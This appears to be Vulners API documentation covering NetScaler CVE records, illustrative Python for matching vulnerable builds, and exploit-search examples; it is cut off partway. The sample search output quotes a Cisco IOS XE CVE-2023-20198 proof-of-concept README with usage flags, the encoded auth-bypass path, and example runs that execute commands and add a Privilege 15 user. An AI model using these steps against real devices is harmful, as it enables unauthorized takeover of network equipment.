"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "12.1-55.302",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.0-92.21",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.1-37.176",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.1-51.15",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "14.1-12.35",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "13.0-92.21",
"operator": "lt",
"name": "citrix netscaler gateway"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "13.1-51.15",
"operator": "lt",
"name": "citrix netscaler gateway"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "14.1-12.35",
"operator": "lt",
"name": "citrix netscaler gateway"
}
],
"affectedConfiguration": [],
"cpeConfiguration": {
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:fips:*:*:*",
"versionStartIncluding": "12.1",
"versionEndExcluding": "12.1-55.302",
"matchCriteriaId": "E5672003-8E6B-4316-B5C9-FE436080ADD1"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:ndcpp:*:*:*",
"versionStartIncluding": "12.1",
"versionEndExcluding": "12.1-55.302",
"matchCriteriaId": "D1A11ABD-4F45-4BA9-B30B-F1D8A612CC15"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.0-92.21:*:*:*:-:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.0-92.21",
"matchCriteriaId": "FC0A5AAC-62DD-416A-A801-A7A95D5EF73C"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-37.176:*:*:*:fips:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-37.176",
"matchCriteriaId": "8C8A6B95-8338-4EE7-A6EC-7D84AEDC4AF3"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-51.15:*:*:*:-:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-51.15",
"matchCriteriaId": "3CF77D9D-FC89-493D-B97D-F9699D182F54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:14.1-12.35:*:*:*:-:*:*:*",
"versionStartIncluding": "14.1",
"versionEndExcluding": "14.1-12.35",
"matchCriteriaId": "62CD82CF-9013-4E54-B175-19B804A351AA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.0-92.21:*:*:*:*:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.0-92.21",
"matchCriteriaId": "68E1F810-ABCD-40A7-A8C1-4E8727799C7C"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.1-51.15:*:*:*:*:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-51.15",
"matchCriteriaId": "E870C309-D5CD-4181-9DEB-4833DE2EAEB7"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:14.1-12.35:*:*:*:*:*:*:*",
"versionStartIncluding": "14.1",
"versionEndExcluding": "14.1-12.35",
"matchCriteriaId": "2836707F-A36F-479E-BFDC-CF55AEFC37EE"
}
]
}
]
},
"extraReferences": [
{
"url": "https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549",
"source": "[email protected]",
"tags": [
"Vendor Advisory"
]
}
],
"product_info": [
{
"vendor": "Cloud Software Group",
"product": "NetScaler ADC"
},
{
"vendor": "Cloud Software Group",
"product": "NetScaler Gateway"
}
],
"solutions": [],
"workarounds": [],
"impacts": [],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code ('Code Injection')",
"lang": "en",
"type": "CWE"
}
]
}
],
"exploits": [],
"assigned": "2023-12-06T11:01:54"
},
"CVE-2023-6549": {
"id": "CVE-2023-6549",
"vendorId": null,
"type": "cve",
"bulletinFamily": "NVD",
"title": "CVE-2023-6549",
"description": "Improper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows Unauthenticated Denial of Service \n",
"published": "2024-01-17T21:15:11",
"modified": "2024-01-24T20:48:33",
"epss": [
{
"cve": "CVE-2023-6549",
"epss": 0.00724,
"percentile": 0.80045,
"modified": "2024-02-11"
}
],
"cvss": {
"score": 5.0,
"vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH"
}
},
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6549",
"reporter": "[email protected]",
"references": [
"https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549"
],
"cvelist": [
"CVE-2023-6549"
],
"immutableFields": [],
"lastseen": "2024-02-12T11:56:58",
"viewCount": 108,
"enchantments": {
"dependencies": {
"references": [
{
"type": "attackerkb",
"idList": [
"AKB:0EFA939C-ED7F-4BFE-B800-FF0C75E53214"
]
},
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2023-6549"
]
},
{
"type": "citrix",
"idList": [
"CTX584986"
]
},
{
"type": "hivepro",
"idList": [
"HIVEPRO:E7C0D983EAA9A4C2CE2DCCCCA4B407DD"
]
},
{
"type": "malwarebytes",
"idList": [
"MALWAREBYTES:6CCC816574632169A05704CE0E1928C8"
]
},
{
"type": "nessus",
"idList": [
"NETSCALER_ADC_GATEWAY_CTX584986.NASL"
]
},
{
"type": "prion",
"idList": [
"PRION:CVE-2023-6549"
]
},
{
"type": "thn",
"idList": [
"THN:55036E69D47D64800FB4CB6F8068DA4F"
]
}
]
},
"score": {
"value": 8.2,
"uncertanity": 0.1,
"vector": "NONE"
},
"reddit": {
"counter": 24,
"posts": [
{
"link": "https://www.reddit.com/r/CTI/comments/19a0a8c/cisa_adds_chrome_and_citrix_netscaler_to_its/",
"text": "CISAaddsChromeandCitrixNetScalertoitsKnownExploitedVulnerabilitiescatalog",
"author": "SirEliasRiddle",
"author_photo": "https://i.redd.it/snoovatar/avatars/nftv2_bmZ0X2VpcDE1NToxMzdfNDY2YTMzMDg4N2JkZjYyZDUzZjk2OGVhODI0NzkzMTUwZjA3NzYyZV8xMTkzMjQ5_rare_892c4323-6b60-487d-9278-5c0b90c591d4-headshot.png",
"date": "2024-01-18T23:43:43+00:00"
}
]
},
"exploitation": {
"wildExploitedSources": [
{
"type": "attackerkb",
"idList": [
"AKB:0EFA939C-ED7F-4BFE-B800-FF0C75E53214"
]
},
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2023-6549"
]
}
],
"wildExploited": true
},
"short_description": "CVE-2023-6549 Denial of Servic",
"tags": [
"cve-2023-6549",
"denial of service",
"nvd"
],
"vulnersScore": 8.2
},
"cna_cvss": {
"cna": "Citrix",
"cvss": {
"3": {
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"score": 8.2
}
}
},
"cpe": [],
"cpe23": [],
"cwe": [
"CWE-119",
"CWE-119"
],
"affectedSoftware": [
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "12.1-55.302",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.0-92.21",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.1-37.176",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.1-51.15",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "14.1-12.35",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "13.0-92.21",
"operator": "lt",
"name": "citrix netscaler gateway"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "13.1-51.15",
"operator": "lt",
"name": "citrix netscaler gateway"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "14.1-12.35",
"operator": "lt",
"name": "citrix netscaler gateway"
}
],
"affectedConfiguration": [],
"cpeConfiguration": {
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:fips:*:*:*",
"versionStartIncluding": "12.1",
"versionEndExcluding": "12.1-55.302",
"matchCriteriaId": "E5672003-8E6B-4316-B5C9-FE436080ADD1"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:ndcpp:*:*:*",
"versionStartIncluding": "12.1",
"versionEndExcluding": "12.1-55.302",
"matchCriteriaId": "D1A11ABD-4F45-4BA9-B30B-F1D8A612CC15"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.0-92.21:*:*:*:-:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.0-92.21",
"matchCriteriaId": "FC0A5AAC-62DD-416A-A801-A7A95D5EF73C"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-37.176:*:*:*:fips:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-37.176",
"matchCriteriaId": "8C8A6B95-8338-4EE7-A6EC-7D84AEDC4AF3"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-51.15:*:*:*:-:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-51.15",
"matchCriteriaId": "3CF77D9D-FC89-493D-B97D-F9699D182F54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:14.1-12.35:*:*:*:-:*:*:*",
"versionStartIncluding": "14.1",
"versionEndExcluding": "14.1-12.35",
"matchCriteriaId": "62CD82CF-9013-4E54-B175-19B804A351AA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.0-92.21:*:*:*:*:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.0-92.21",
"matchCriteriaId": "68E1F810-ABCD-40A7-A8C1-4E8727799C7C"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.1-51.15:*:*:*:*:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-51.15",
"matchCriteriaId": "E870C309-D5CD-4181-9DEB-4833DE2EAEB7"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:14.1-12.35:*:*:*:*:*:*:*",
"versionStartIncluding": "14.1",
"versionEndExcluding": "14.1-12.35",
"matchCriteriaId": "2836707F-A36F-479E-BFDC-CF55AEFC37EE"
}
]
}
]
},
"extraReferences": [
{
"url": "https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549",
"source": "[email protected]",
"tags": [
"Vendor Advisory"
]
}
],
"product_info": [
{
"vendor": "Cloud Software Group",
"product": "NetScaler ADC"
}
],
"solutions": [],
"workarounds": [],
"impacts": [],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-119",
"description": "CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer",
"lang": "en",
"type": "CWE"
}
]
}
],
"exploits": [],
"assigned": "2023-12-06T11:01:58"
}
}
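The records above carry more than a score: NVD and CNA CVSS vectors that disagree (7.5 versus 8.2 for CVE-2023-6549), an EPSS entry, a wildExploited flag with its CISA KEV source, and two encodings of the affected builds. The flat affectedSoftware list only says "lt 14.1-12.35", so a patched 13.1-51.x build compares as lower than the 14.1 fix and gets flagged; the cpeConfiguration entries bound each branch with versionStartIncluding/versionEndExcluding and carry the FIPS/NDcPP edition inside the CPE string. The following Python is added here as an illustration and is not part of the Vulners documentation or SDK: it evaluates an installed NetScaler build against a constructed excerpt of the CVE-2023-6549 record (values copied from the response above, entries trimmed) and pulls out the triage signals. It assumes NetScaler builds order as major.minor-build.patch tuples; the function names and the RECORD excerpt are mine.

```python
import re

# Constructed excerpt of the CVE-2023-6549 record shown above (subset of its
# cpeMatch entries, one affectedSoftware entry; values copied from the page).
RECORD = {
    "id": "CVE-2023-6549",
    "epss": [{"cve": "CVE-2023-6549", "epss": 0.00724, "percentile": 0.80045}],
    "cvss3": {"cvssV3": {"baseScore": 7.5,
                         "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}},
    "cna_cvss": {"cna": "Citrix", "cvss": {"3": {
        "score": 8.2, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H"}}},
    "enchantments": {"exploitation": {
        "wildExploited": True,
        "wildExploitedSources": [{"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2023-6549"]}]}},
    "affectedSoftware": [
        {"cpeName": "citrix:netscaler_application_delivery_controller",
         "version": "14.1-12.35", "operator": "lt"}],
    "cpeConfiguration": {"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [
        {"vulnerable": True, "versionStartIncluding": "12.1", "versionEndExcluding": "12.1-55.302",
         "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:fips:*:*:*"},
        {"vulnerable": True, "versionStartIncluding": "13.0", "versionEndExcluding": "13.0-92.21",
         "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.0-92.21:*:*:*:-:*:*:*"},
        {"vulnerable": True, "versionStartIncluding": "13.1", "versionEndExcluding": "13.1-51.15",
         "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-51.15:*:*:*:-:*:*:*"},
        {"vulnerable": True, "versionStartIncluding": "14.1", "versionEndExcluding": "14.1-12.35",
         "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:14.1-12.35:*:*:*:-:*:*:*"},
        {"vulnerable": True, "versionStartIncluding": "13.1", "versionEndExcluding": "13.1-51.15",
         "criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.1-51.15:*:*:*:*:*:*:*"},
    ]}]},
}
ADC = "citrix:netscaler_application_delivery_controller"


def parse_build(version):
    """'13.1-51.15' -> (13, 1, 51, 15); '13.1' -> (13, 1). Assumes NetScaler builds
    order lexicographically as major.minor-build.patch, so tuple comparison works."""
    return tuple(int(p) for p in re.split(r"[.-]", version))


def cpe_fields(criteria):
    """Split a cpe:2.3 string into (vendor:product, sw_edition); sw_edition is field 9."""
    parts = criteria.split(":")
    return f"{parts[3]}:{parts[4]}", parts[9]


def matching_ranges(record, cpe_name, edition=None):
    """Yield (start, end) pairs from cpeConfiguration for this product and edition.
    In cpe:2.3, '*' is ANY and '-' is NA (the standard build), so a '-' entry
    only applies to an install with no edition and 'fips' only to a FIPS build."""
    for node in record.get("cpeConfiguration", {}).get("nodes", []):
        for m in node.get("cpeMatch", []):
            if not m.get("vulnerable"):
                continue
            name, sw_edition = cpe_fields(m["criteria"])
            if name != cpe_name:
                continue
            if sw_edition == "-" and edition is not None:
                continue
            if sw_edition not in ("*", "-") and sw_edition != edition:
                continue
            yield m.get("versionStartIncluding"), m.get("versionEndExcluding")


def is_affected(record, cpe_name, installed, edition=None):
    """True/False when the record has ranges for this product and edition;
    None when it lists none (absent range means 'not covered', not 'safe')."""
    v = parse_build(installed)
    ranges = list(matching_ranges(record, cpe_name, edition))
    if not ranges:
        return None
    return any((start is None or parse_build(start) <= v) and
               (end is None or v < parse_build(end)) for start, end in ranges)


def naive_lt_affected(record, cpe_name, installed):
    """What a bare affectedSoftware 'lt' check gives: every branch's fix build is
    compared with the install, so a patched 13.1 build is 'lt' 14.1-12.35 and
    is wrongly flagged. Kept only to make that false positive visible."""
    v = parse_build(installed)
    return any(e["cpeName"] == cpe_name and e["operator"] == "lt"
               and v < parse_build(e["version"]) for e in record.get("affectedSoftware", []))


def triage(record):
    """Signals a ticket needs: NVD vs CNA CVSS (and the worse of the two), EPSS, wild exploitation, KEV."""
    nvd = record.get("cvss3", {}).get("cvssV3", {}).get("baseScore")
    cna = record.get("cna_cvss", {}).get("cvss", {}).get("3", {}).get("score")
    epss = (record.get("epss") or [{}])[0].get("epss")
    ex = record.get("enchantments", {}).get("exploitation", {})
    return {"id": record["id"], "cvss_nvd": nvd, "cvss_cna": cna,
            "cvss_max": max(s for s in (nvd, cna) if s is not None), "epss": epss,
            "wild_exploited": bool(ex.get("wildExploited")),
            "kev": any(s.get("type") == "cisa_kev" for s in ex.get("wildExploitedSources", []))}


if __name__ == "__main__":
    for build, ed in [("13.1-49.13", None), ("13.1-51.15", None), ("13.1-60.0", None),
                      ("12.1-55.300", "fips"), ("12.1-55.300", None)]:
        print(build, ed or "standard", "range check:", is_affected(RECORD, ADC, build, ed),
              "bare lt:", naive_lt_affected(RECORD, ADC, build))
    print(triage(RECORD))
```

The None return separates "no range in this record covers the product" from "a range exists and the build is outside it"; an absent range should be resolved against the vendor bulletin in extraReferences rather than read as safe, and a 12.1 standard build is a case in point, since only the FIPS and NDcPP 12.1 builds appear in the record.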
Publicly available exploits¶
Use this method to retrieve publicly available exploits from the Vulners database for a vulnerability identifier (a CVE) or a software identifier. It uses the same Lucene search endpoint as the database search; restricting the query with bulletinFamily:exploit, as the third example below does, is what limits the hits to exploit documents.
Required parameters:
- query (str): Search query in Lucene syntax
- skip (int): Number of leading results to skip (offset, for paging through result sets larger than size)
- size (int): Count of output elements
- apiKey: Activated API key
Query:
POST /api/v3/search/lucene/
Query example for a software identifier:
curl -XPOST https://vulners.com/api/v3/search/lucene/ -H 'Content-Type: application/json' -d '{
"query": "cisco ios xe",
"skip": 0,
"size": 100,
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist"],
"apiKey": "{API key}"
}'
Query example for a CVE (vulnerability identifier):
curl -XPOST https://vulners.com/api/v3/search/lucene/ -H 'Content-Type: application/json' -d '{
"query": "CVE-2023-20198",
"skip": 0,
"size": 100,
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist"],
"apiKey": "{API key}"
}'
Example using the general search with an explicit exploit filter in the query:
curl -XPOST https://vulners.com/api/v3/search/lucene/ -H 'Content-Type: application/json' -d '{
"query": "bulletinFamily:exploit AND cisco ios xe",
"skip": 0,
"size": 10,
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist"],
"apiKey": "{API key}"
}'
cisco_exploits = vulners_api.find_exploit_all("cisco ios xe")  # software identifier
cve_exploits = vulners_api.find_exploit_all("CVE-2023-20198", limit=5)  # CVE identifier
search_exploits = vulners_api.find_all("bulletinFamily:exploit AND cisco ios xe", limit=5)  # general search, exploit filter in the query
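The three calls above all go to the same /api/v3/search/lucene/ endpoint as the database search; what turns it into an exploit search is the bulletinFamily:exploit clause, which the third example adds by hand. Two things the curl bodies do not show: how to page with skip/size past the first size results, and that the API key travels in the JSON body, so it lands in shell history whenever it is pasted into a command. The following Python is added as an illustration and is not Vulners' own code or SDK: it builds the request body (with the exploit filter and a de-duplicated field list), pages until a short page comes back, and groups the hits by CVE, reading the key from a VULNERS_API_KEY environment variable when none is passed. The page shows the SDK's output as a plain list of hits and never shows the raw endpoint's envelope, so the data.search[]._source fallback in extract_hits is an assumption; SAMPLE_HITS is constructed from the ids, hrefs and cvelists in the output below, and the function names are mine.

```python
import io
import json
import os
import urllib.request
from collections import defaultdict

SEARCH_URL = "https://vulners.com/api/v3/search/lucene/"

# Field set this page lists as the Python SDK's default.
DEFAULT_FIELDS = ["id", "title", "description", "type", "bulletinFamily", "cvss",
                  "published", "modified", "lastseen", "href", "sourceHref",
                  "sourceData", "cvelist"]

# Constructed sample hits: ids, types, hrefs and cvelists are copied from the
# page's sample output, everything else is trimmed. Used by the offline demo only.
SAMPLE_HITS = [
    {"id": "943D5962-14B3-5410-8106-BD5EEA778153", "type": "githubexploit",
     "bulletinFamily": "exploit", "cvelist": ["CVE-2023-20198", "CVE-2023-20273"],
     "href": "https://github.com/smokeintheshell/CVE-2023-20198", "cvss": {"score": 10.0}},
    {"id": "80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011", "type": "githubexploit",
     "bulletinFamily": "exploit", "cvelist": ["CVE-2023-20273"],
     "href": "https://github.com/smokeintheshell/CVE-2023-20273", "cvss": {"score": 7.2}},
    {"id": "PACKETSTORM:180826", "type": "packetstorm", "bulletinFamily": "exploit",
     "cvelist": ["CVE-2023-20198"],
     "href": "https://packetstormsecurity.com/files/180826/Cisco-IOX-XE-Unauthenticated-Command-Line-Interface-CLI-Execution.html"},
]


def build_exploit_query(query, skip=0, size=100, fields=None, api_key=None):
    """Body for POST /api/v3/search/lucene/. Always adds the bulletinFamily:exploit
    clause from the page's third curl example so only exploit documents match, and
    de-duplicates the field list. Without an explicit key, VULNERS_API_KEY is used,
    which keeps the key out of shell history and pasted commands."""
    if api_key is None:
        api_key = os.environ.get("VULNERS_API_KEY", "")
    return {"query": f"bulletinFamily:exploit AND ({query})", "skip": skip, "size": size,
            "fields": list(dict.fromkeys(fields or DEFAULT_FIELDS)), "apiKey": api_key}


def extract_hits(data):
    """Flatten a response to a list of hit dicts. The page shows the SDK's output
    as a plain list; the raw endpoint's envelope is not shown on this page, so the
    data.search[]._source layout handled here is an assumption."""
    if isinstance(data, list):
        return data
    search = (data.get("data") or {}).get("search") or []
    return [h.get("_source", h) for h in search]


def search_exploits(query, api_key=None, page_size=100, max_hits=1000,
                    opener=urllib.request.urlopen):
    """Walk the result set with skip/size; stop at the first short page or at max_hits."""
    hits, skip = [], 0
    while skip < max_hits:
        body = build_exploit_query(query, skip=skip, size=page_size, api_key=api_key)
        req = urllib.request.Request(SEARCH_URL, data=json.dumps(body).encode(),
                                     headers={"Content-Type": "application/json"})
        with opener(req) as resp:
            page = extract_hits(json.load(resp))
        hits.extend(page)
        if len(page) < page_size:
            break
        skip += page_size
    return hits


def index_exploits_by_cve(hits):
    """Group exploit hits by CVE: {cve: [{id, type, href, score}, ...]}.
    A hit tagged with several CVEs appears under each; one with no cvelist goes
    under None. Documents that are not exploits are dropped."""
    by_cve = defaultdict(list)
    for hit in hits:
        if hit.get("bulletinFamily") != "exploit":
            continue
        entry = {"id": hit["id"], "type": hit.get("type"), "href": hit.get("href"),
                 "score": (hit.get("cvss") or {}).get("score")}
        for cve in hit.get("cvelist") or [None]:
            by_cve[cve].append(entry)
    return dict(by_cve)


def make_demo_opener(hits):
    """Offline stand-in for urllib.request.urlopen that serves `hits` page by page
    according to the skip/size in the posted body (constructed data, no network)."""
    def opener(req):
        body = json.loads(req.data.decode())
        page = hits[body["skip"]:body["skip"] + body["size"]]
        return io.BytesIO(json.dumps(page).encode())
    return opener


if __name__ == "__main__":
    found = search_exploits("cisco ios xe", api_key="demo", page_size=2,
                            opener=make_demo_opener(SAMPLE_HITS))
    for cve, entries in sorted(index_exploits_by_cve(found).items(), key=lambda kv: kv[0] or ""):
        print(cve, [e["id"] for e in entries])
```

Pass the real urllib opener (the default) and a key to run it against the service; the demo opener exists so the paging logic can be exercised without credentials. Note that the same GitHub README can be indexed under several ids (the output below carries two forks of one PoC), so de-duplicate on href, not id, before counting "exploits per CVE".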
Query output for the software identifier example:
[
{
"lastseen": "2024-09-12T13:39:16",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 